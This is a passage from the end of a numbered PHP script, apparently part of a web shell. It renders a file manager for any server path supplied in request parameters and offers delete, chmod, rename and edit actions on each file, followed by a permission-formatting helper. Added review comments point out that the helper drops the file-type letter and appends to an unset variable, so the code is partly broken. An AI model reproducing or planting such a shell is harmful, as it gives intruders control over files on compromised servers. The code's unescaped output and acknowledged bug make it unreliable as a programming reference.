  570. <input type="hidden" name="name" value="'.$dir.'">
  571. <input type="hidden" name="_path_" value="'.$_path_.'/'.$dir.'">
  572. <input type="submit" value=">">
  573. </form></center></td>
  574. </tr>';
  575. }
  576. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  // Second pass: regular files, with size shown in KB or MB and an extra
  // "Edit" action in the per-row form.
  577. foreach($scandir as $file){
  578. if(!is_file($_path_.'/'.$file)) continue;
  579. $size = filesize($_path_.'/'.$file)/1024;
  580. $size = round($size,3);
  581. if($size >= 1024){
  582. $size = round($size/1024,2).' MB';
  583. }else{
  584. $size = $size.' KB';
  585. }
  586.  
  587. echo '<tr>
  588. <td><a href="?_filesrc_='.$_path_.'/'.$file.'&_path_='.$_path_.'">'.$file.'</a></td>
  589. <td><center>'.$size.'</center></td>
  590. <td><center>';
  591. if(is_writable($_path_.'/'.$file)) echo '<font color="lime">';
  592. elseif(!is_readable($_path_.'/'.$file)) echo '<font color="red">';
  593. echo perms($_path_.'/'.$file);
  594. if(is_writable($_path_.'/'.$file) || !is_readable($_path_.'/'.$file)) echo '</font>';
  595. echo '</center></td>
  596. <td><center><form method="POST" action="?option&_path_='.$_path_.'">
  597. <select name="opt">
  598. <option value="">Pilih</option>
  599. <option value="delete">Delete</option>
  600. <option value="chmod">Chmod</option>
  601. <option value="rename">Rename</option>
  602. <option value="edit">Edit</option>
  603. </select>
  604. <input type="hidden" name="type" value="file">
  605. <input type="hidden" name="name" value="'.$file.'">
  606. <input type="hidden" name="_path_" value="'.$_path_.'/'.$file.'">
  607. <input type="submit" value=">">
  608. </form></center></td>
  609. </tr>';
  610. }
  611. echo '</table>
  612. </div></body>
  613. </html>';
  614. }
  // perms($file): formats the mode bits from fileperms() as an ls-style
  // string (owner, group and other rwx triplets, with s/S and t/T for the
  // setuid, setgid and sticky bits) and returns it.
  // NOTE(review): every file-type branch except the last stores its letter in
  // $i, which is never read afterwards; only the fallback assigns $info. For
  // the other branches the returned string therefore carries no type letter
  // and $info is first touched by ".=" while still unset.
  615. function perms($file){
  616. $perms = fileperms($file);
  617. if (($perms &0xC000) == 0xC000)$i = 's';
  618. elseif (($perms &0xA000) == 0xA000)$i = 'l';
  619. elseif (($perms &0x8000) == 0x8000)$i = '-';
  620. elseif (($perms &0x6000) == 0x6000)$i = 'b';
  621. elseif (($perms &0x4000) == 0x4000)$i = 'd';
  622. elseif (($perms &0x2000) == 0x2000)$i = 'c';
  623. elseif (($perms &0x1000) == 0x1000)$i = 'p';
  624. else $info = 'u';
  // Owner triplet; 0x0800 is the setuid bit.
  625. $info .= (($perms &0x0100) ?'r': '-');
  626. $info .= (($perms &0x0080) ?'w': '-');
  627. $info .= (($perms &0x0040) ?(($perms &0x0800) ?'s': 'x') : (($perms &0x0800) ?'S': '-'));
  // Group triplet; 0x0400 is the setgid bit.
  628. $info .= (($perms &0x0020) ?'r': '-');
  629. $info .= (($perms &0x0010) ?'w': '-');
  630. $info .= (($perms &0x0008) ?(($perms &0x0400) ?'s': 'x') : (($perms &0x0400) ?'S': '-'));
  // Other triplet; 0x0200 is the sticky bit.
  631. $info .= (($perms &0x0004) ?'r': '-');
  632. $info .= (($perms &0x0002) ?'w': '-');
  633. $info .= (($perms &0x0001) ?(($perms &0x0200) ?'t': 'x') : (($perms &0x0200) ?'T': '-'));
  634. return $info;
  635. }
  636. ?>